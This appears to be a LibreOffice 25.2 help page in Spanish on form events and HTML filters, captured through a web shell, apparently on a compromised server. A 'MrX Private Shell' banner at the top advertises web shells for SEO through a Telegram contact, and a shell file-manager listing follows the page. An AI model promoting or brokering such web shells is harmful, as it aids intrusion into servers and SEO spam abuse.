__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<!DOCTYPE html>
<html lang="es" dir="ltr">
<head>
<base href="../../../../">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Formularios y filtros HTML</title>
<link rel="shortcut icon" href="media/navigation/favicon.ico">
<link type="text/css" href="normalize.css" rel="Stylesheet">
<link type="text/css" href="prism.css" rel="Stylesheet">
<link type="text/css" href="default.css" rel="Stylesheet">
<script type="text/javascript" src="polyfills.js"></script><script type="text/javascript" src="languages.js"></script><script type="text/javascript" src="es/langnames.js"></script><script type="text/javascript" src="flexsearch.debug.js"></script><script type="text/javascript" src="prism.js"></script><script type="text/javascript" src="help2.js" defer></script><script type="text/javascript" src="a11y-toggle.js" defer></script><script type="text/javascript" src="paginathing.js" defer></script><script type="text/javascript" src="es/bookmarks.js" defer></script><script type="text/javascript" src="es/contents.js" defer></script><script type="text/javascript" src="help.js" defer></script><meta name="viewport" content="width=device-width,initial-scale=1">
</head>
<body>
<header id="TopLeftHeader"><a class="symbol" href="es/text/shared/05/new_help.html"><div></div></a><a class="logo" href="es/text/shared/05/new_help.html"><p dir="auto">Ayuda de LibreOffice 25.2</p></a><div class="dropdowns"><div class="modules">
<button type="button" data-a11y-toggle="modules-nav" id="modules" aria-haspopup="true" aria-expanded="false" aria-controls="modules-nav">Módulo</button><nav id="modules-nav" hidden=""></nav>
</div></div></header><aside class="leftside"><input id="accordion-1" name="accordion-menu" type="checkbox"><label for="accordion-1" dir="auto">Contenido</label><div id="Contents" class="contents-treeview"></div></aside><div id="SearchFrame"><div id="Bookmarks">
<input id="search-bar" type="search" class="search" placeholder="Buscar en los marcadores de todos los módulos" dir="auto"><div class="nav-container" tabindex="0"><nav class="index" dir="auto"></nav></div>
</div></div>
<div id="DisplayArea" itemprop="softwareHelp" itemscope="true" itemtype="http://schema.org/SoftwareApplication">
<noscript><div id="WarnJS"><h1 dir="auto">Active JavaScript en el navegador para mostrar las páginas de ayuda de LibreOffice.</h1></div></noscript>
<a id="bm_id3163829"></a><meta itemprop="keywords" content="formularios,filtros HTML">
<h1 id="hd_id3163829" dir="auto">Formularios y filtros HTML</h1>
<p id="par_id3147285" class="paragraph" dir="auto">Puede usar todos los elementos de control y eventos de formulario en documentos HTML. Existen numerosos eventos a la fecha (por ejemplo, eventos de foco), que no han cambiado. Se continuarán exportando e importando como ONFOCUS, ONBLUR, etcétera, para JavaScript, y como SDONFOCUS, SDONBLUR, etcétera, para LibreOffice BASIC.</p>
<p id="par_id3150616" class="paragraph" dir="auto">Para el resto de acontecimientos, se emplean nombres genéricos compuestos por la interfaz de oyente y el nombre del método del acontecimiento: un acontecimiento que esté registrado como XListener::method se exporta como</p>
<p id="par_id3147571" class="paragraph" dir="auto">SDEvent-XListener-method = "/* event-code */"</p>
<p id="par_id3152425" class="paragraph" dir="auto">Tenga en cuenta que los componentes del método y de la interfaz Xlistener de esta opción distinguen entre mayúsculas y minúsculas.</p>
<p id="par_id3153683" class="paragraph" dir="auto">La gestión de acciones de controles se lleva a cabo a través de la API de LibreOffice. Si asigna una acción a un campo de control, un objeto se registra internamente como "Listener" ("oyente") para una acción de control específica. Para ello, el objeto debe utilizar una interfaz específica, como la interfaz XfocusListener, para poder reaccionar a las acciones de foco. Cuando tiene lugar la acción, el campo de control llama a un método especial de la interfaz Listener cuando el campo de control recibe el foco. A continuación, el objeto registrado internamente llama al código JavaScript o LibreOffice Basic asignado a la acción.</p>
<p id="par_id3156410" class="paragraph" dir="auto">Ahora, el filtro HTML utiliza específicamente estas interfaces de oyente y nombres de método, de forma que se puede importar y exportar acciones a voluntad. Puede registrar una acción de foco a través de</p>
<p id="par_id3150506" class="paragraph" dir="auto"><INPUT TYPE=text ONFOCUS="/* code */"</p>
<p id="par_id3154289" class="paragraph" dir="auto">en lugar de mediante el</p>
<p id="par_id3155391" class="paragraph" dir="auto"><INPUT TYPE=text SDEvent-XFocusListener-focusGained="/* code */"</p>
<p id="par_id3152996" class="paragraph" dir="auto">registro. Por ello, las acciones se pueden registrar como se quiera, también las no ofrecidas por los cuadros de lista. Para definir el lenguaje de script de las acciones, escriba la línea siguiente en el encabezado del documento:</p>
<p id="par_id3150443" class="paragraph" dir="auto"><META HTTP-EQUIV="content-script-type" CONTENT="..."></p>
<p id="par_id3166410" class="paragraph" dir="auto">Para CONTENT puede utilizar, por ejemplo, «text/x-StarBasic» en LibreOffice Basic o «text/JavaScript» en JavaScript. Si no indica nada, la opción predeterminada es JavaScript.</p>
<p id="par_id3146797" class="paragraph" dir="auto">Durante la exportación, el lenguaje interpretado predeterminado se definirá en función del primer módulo encontrado en la gestión de macros. En el caso de los eventos, solo se puede utilizar un lenguaje por documento.</p>
</div>
<div id="DonationFrame"></div>
<footer><h2 style="text-align: center;"><a href="https://books.libreoffice.org" target="_blank">Libros de LibreOffice</a></h2>
<div class="noteicon" dir="auto" style="display:flex;justify-content:center;flex-wrap:wrap;row-gap:15px;">
<img src="media/navigation/libo-writer.svg" alt="Writer Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-calc.svg" alt="Calc Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-impress.svg" alt="Impress Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-draw.svg" alt="Draw Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-base.svg" alt="Base Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-math.svg" alt="Math Icon" style="width:60px;height:60px;"><img src="media/navigation/libo-symbol-black.svg" alt="Getting Started Icon" style="width:60px;height:60px;">
</div>
<div id="DEBUG" class="debug">
<h3 class="bug">Help content debug info:</h3>
<p dir="auto">This page is: <a href="https://opengrok.libreoffice.org/xref/help/source/text/shared/02/01170700.xhp" target="_blank">/text/shared/02/01170700.xhp</a></p>
<p dir="auto">Title is: Formularios y filtros HTML</p>
<p id="bm_module" dir="auto"></p>
<p id="bm_system" dir="auto"></p>
<p id="bm_HID" dir="auto"></p>
</div></footer>
</body>
</html>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 01110000.html | File | 5.89 KB | 0644 |
|
| 01140000.html | File | 30.59 KB | 0644 |
|
| 01170000.html | File | 44.1 KB | 0644 |
|
| 01170001.html | File | 7.7 KB | 0644 |
|
| 01170002.html | File | 5.95 KB | 0644 |
|
| 01170003.html | File | 5.21 KB | 0644 |
|
| 01170004.html | File | 11.86 KB | 0644 |
|
| 01170100.html | File | 12.01 KB | 0644 |
|
| 01170101.html | File | 63.74 KB | 0644 |
|
| 01170102.html | File | 50.26 KB | 0644 |
|
| 01170103.html | File | 12.84 KB | 0644 |
|
| 01170200.html | File | 11.09 KB | 0644 |
|
| 01170201.html | File | 12.52 KB | 0644 |
|
| 01170202.html | File | 17.64 KB | 0644 |
|
| 01170203.html | File | 21.52 KB | 0644 |
|
| 01170300.html | File | 8.14 KB | 0644 |
|
| 01170400.html | File | 6.1 KB | 0644 |
|
| 01170500.html | File | 6.75 KB | 0644 |
|
| 01170600.html | File | 13.31 KB | 0644 |
|
| 01170700.html | File | 6.87 KB | 0644 |
|
| 01170800.html | File | 6.95 KB | 0644 |
|
| 01170801.html | File | 5.14 KB | 0644 |
|
| 01170802.html | File | 6.39 KB | 0644 |
|
| 01170900.html | File | 12.46 KB | 0644 |
|
| 01170901.html | File | 5.67 KB | 0644 |
|
| 01170902.html | File | 5.26 KB | 0644 |
|
| 01170903.html | File | 6.18 KB | 0644 |
|
| 01170904.html | File | 6.37 KB | 0644 |
|
| 01171000.html | File | 7.05 KB | 0644 |
|
| 01171100.html | File | 5.81 KB | 0644 |
|
| 01171200.html | File | 6.75 KB | 0644 |
|
| 01171300.html | File | 9.07 KB | 0644 |
|
| 01171400.html | File | 7.54 KB | 0644 |
|
| 01220000.html | File | 5.35 KB | 0644 |
|
| 01230000.html | File | 5.72 KB | 0644 |
|
| 02010000.html | File | 5.67 KB | 0644 |
|
| 02020000.html | File | 7.56 KB | 0644 |
|
| 02030000.html | File | 5.05 KB | 0644 |
|
| 02040000.html | File | 4.51 KB | 0644 |
|
| 02050000.html | File | 4.48 KB | 0644 |
|
| 02130000.html | File | 9.02 KB | 0644 |
|
| 02140000.html | File | 11.69 KB | 0644 |
|
| 02160000.html | File | 12.08 KB | 0644 |
|
| 02170000.html | File | 4.78 KB | 0644 |
|
| 03110000.html | File | 6.42 KB | 0644 |
|
| 03120000.html | File | 6.4 KB | 0644 |
|
| 03130000.html | File | 6.93 KB | 0644 |
|
| 03140000.html | File | 4.92 KB | 0644 |
|
| 03150000.html | File | 4.71 KB | 0644 |
|
| 03200000.html | File | 6.35 KB | 0644 |
|
| 04210000.html | File | 21.4 KB | 0644 |
|
| 05020000.html | File | 4.81 KB | 0644 |
|
| 05090000.html | File | 6.4 KB | 0644 |
|
| 05110000.html | File | 6.93 KB | 0644 |
|
| 06050000.html | File | 9.42 KB | 0644 |
|
| 06060000.html | File | 9.42 KB | 0644 |
|
| 06100000.html | File | 9.51 KB | 0644 |
|
| 06110000.html | File | 9.52 KB | 0644 |
|
| 06120000.html | File | 8.05 KB | 0644 |
|
| 07010000.html | File | 4.36 KB | 0644 |
|
| 07060000.html | File | 5.29 KB | 0644 |
|
| 07070000.html | File | 6.88 KB | 0644 |
|
| 07070100.html | File | 5.05 KB | 0644 |
|
| 07070200.html | File | 4.99 KB | 0644 |
|
| 07080000.html | File | 4.24 KB | 0644 |
|
| 07090000.html | File | 5.02 KB | 0644 |
|
| 08010000.html | File | 4.06 KB | 0644 |
|
| 08020000.html | File | 4.01 KB | 0644 |
|
| 09070000.html | File | 9.88 KB | 0644 |
|
| 09070100.html | File | 8.28 KB | 0644 |
|
| 09070200.html | File | 7.3 KB | 0644 |
|
| 09070300.html | File | 8.03 KB | 0644 |
|
| 09070400.html | File | 7.69 KB | 0644 |
|
| 10010000.html | File | 4.53 KB | 0644 |
|
| 10020000.html | File | 4.53 KB | 0644 |
|
| 10030000.html | File | 5.06 KB | 0644 |
|
| 10040000.html | File | 4.98 KB | 0644 |
|
| 10100000.html | File | 4.94 KB | 0644 |
|
| 12000000.html | File | 5.6 KB | 0644 |
|
| 12010000.html | File | 6.3 KB | 0644 |
|
| 12020000.html | File | 6.27 KB | 0644 |
|
| 12030000.html | File | 5.47 KB | 0644 |
|
| 12040000.html | File | 4.5 KB | 0644 |
|
| 12050000.html | File | 5.3 KB | 0644 |
|
| 12070000.html | File | 7.13 KB | 0644 |
|
| 12070100.html | File | 11.31 KB | 0644 |
|
| 12070200.html | File | 9.19 KB | 0644 |
|
| 12070300.html | File | 8.14 KB | 0644 |
|
| 12080000.html | File | 4.5 KB | 0644 |
|
| 12090100.html | File | 9.31 KB | 0644 |
|
| 12090101.html | File | 8.83 KB | 0644 |
|
| 12100000.html | File | 4.2 KB | 0644 |
|
| 12100100.html | File | 6.83 KB | 0644 |
|
| 12100200.html | File | 28.75 KB | 0644 |
|
| 12110000.html | File | 5.11 KB | 0644 |
|
| 12120000.html | File | 4.63 KB | 0644 |
|
| 12130000.html | File | 5.03 KB | 0644 |
|
| 12140000.html | File | 4.76 KB | 0644 |
|
| 13010000.html | File | 4.31 KB | 0644 |
|
| 13020000.html | File | 9.69 KB | 0644 |
|
| 14010000.html | File | 4.97 KB | 0644 |
|
| 14020000.html | File | 4.38 KB | 0644 |
|
| 14020100.html | File | 6.2 KB | 0644 |
|
| 14020200.html | File | 4.42 KB | 0644 |
|
| 14030000.html | File | 5.31 KB | 0644 |
|
| 14040000.html | File | 4.48 KB | 0644 |
|
| 14050000.html | File | 4.49 KB | 0644 |
|
| 14060000.html | File | 4.43 KB | 0644 |
|
| 14070000.html | File | 4.78 KB | 0644 |
|
| 18010000.html | File | 6.72 KB | 0644 |
|
| 18030000.html | File | 5.54 KB | 0644 |
|
| 19090000.html | File | 5.8 KB | 0644 |
|
| 20020000.html | File | 5.98 KB | 0644 |
|
| 20030000.html | File | 4.4 KB | 0644 |
|
| 20040000.html | File | 5.8 KB | 0644 |
|
| 20050000.html | File | 8.02 KB | 0644 |
|
| 20060000.html | File | 5.08 KB | 0644 |
|
| 20090000.html | File | 3.79 KB | 0644 |
|
| 20100000.html | File | 3.8 KB | 0644 |
|
| 24010000.html | File | 15.43 KB | 0644 |
|
| 24020000.html | File | 5.43 KB | 0644 |
|
| 24030000.html | File | 5.02 KB | 0644 |
|
| 24040000.html | File | 5.04 KB | 0644 |
|
| 24050000.html | File | 5.03 KB | 0644 |
|
| 24060000.html | File | 5.02 KB | 0644 |
|
| 24070000.html | File | 5.05 KB | 0644 |
|
| 24080000.html | File | 5.06 KB | 0644 |
|
| 24090000.html | File | 4.44 KB | 0644 |
|
| 24100000.html | File | 9.61 KB | 0644 |
|
| basicshapes.html | File | 5.77 KB | 0644 |
|
| blockarrows.html | File | 5.92 KB | 0644 |
|
| callouts.html | File | 5.47 KB | 0644 |
|
| colortoolbar.html | File | 10.98 KB | 0644 |
|
| eliminate_points.html | File | 6.68 KB | 0644 |
|
| find_toolbar.html | File | 11.03 KB | 0644 |
|
| flowcharts.html | File | 5.54 KB | 0644 |
|
| fontwork.html | File | 6.92 KB | 0644 |
|
| fontwork_toolbar.html | File | 9.06 KB | 0644 |
|
| gridtofront.html | File | 4.65 KB | 0644 |
|
| limit.html | File | 4.09 KB | 0644 |
|
| mediaplay_toolbar.html | File | 7.3 KB | 0644 |
|
| namedialog.html | File | 3.93 KB | 0644 |
|
| paintbrush.html | File | 6.62 KB | 0644 |
|
| querypropdlg.html | File | 5.38 KB | 0644 |
|
| rotate_180.html | File | 5.02 KB | 0644 |
|
| rotate_left.html | File | 5.93 KB | 0644 |
|
| rotate_right.html | File | 6.06 KB | 0644 |
|
| stars.html | File | 5.51 KB | 0644 |
|
| symbolshapes.html | File | 5.98 KB | 0644 |
|